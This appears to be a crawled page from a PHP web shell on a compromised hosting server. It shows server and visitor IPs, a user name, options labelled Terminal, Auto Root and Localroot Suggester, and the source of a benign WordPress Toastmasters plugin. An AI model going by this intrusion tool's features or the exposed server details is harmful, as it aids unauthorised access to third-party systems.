Linux server.edchosting.com 4.18.0-553.79.1.lve.el7h.x86_64 #1 SMP Wed Oct 15 16:34:46 UTC 2025 x86_64
LiteSpeed
Server IP : 75.98.162.185 & Your IP : 216.73.216.163
Domains :
Cant Read [ /etc/named.conf ]
User : goons4good
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
a2wp_toastmasters /
Delete
Unzip
Name
Size
Permission
Date
Action
hooks
[ DIR ]
drwxr-xr-x
2025-04-30 04:08
templates
[ DIR ]
drwxr-xr-x
2025-04-30 04:08
a2wp_toastmasters.php
1.21
KB
-rw-r--r--
2025-04-29 15:41
a2wp_toastmasters.zip
1.92
KB
-rw-r--r--
2025-04-29 15:41
index.php
27
B
-rw-r--r--
2025-04-29 15:41
Save
Rename
<?php /** * Plugin Name: A2 WP Toastmasters Helper * Author: A2 Hosting * Version: 1.0.1 * Author URI: https://www.a2hosting.com/ * License: GPL2 * Liecense URI: https://www.gnu.org/licenses/gpl-2.0.html */ // Prevent direct access to this file if ( ! defined( 'WPINC' ) ) die; class A2WPToastmastersPlugin { public function __construct(){ register_activation_hook(__FILE__, array( $this , 'activate' )); add_action( 'wp_dashboard_setup', array( $this, 'setup_widget' )); } // One-time setup stuff public function activate () { wp4toast_template(1); // install standard meeting templates, author = admin ID #1 rsvptoast_pages (1); // install placeholder pages for calendar and member directory; set up menu wp_update_term(1, 'category', array( 'name' => 'Club News', 'slug' => 'club-news' )); wp_create_category('Members Only'); } public function widget_output() { // outputs the content of the widget echo file_get_contents(__DIR__.'/templates/dashboard.html'); } public function setup_widget () { wp_add_dashboard_widget( 'a2wp_toastmaster_widget', 'WP Toastmaster Setup', array( $this, 'widget_output') ); } } $a2wp_toastmasters = new A2WPToastmastersPlugin();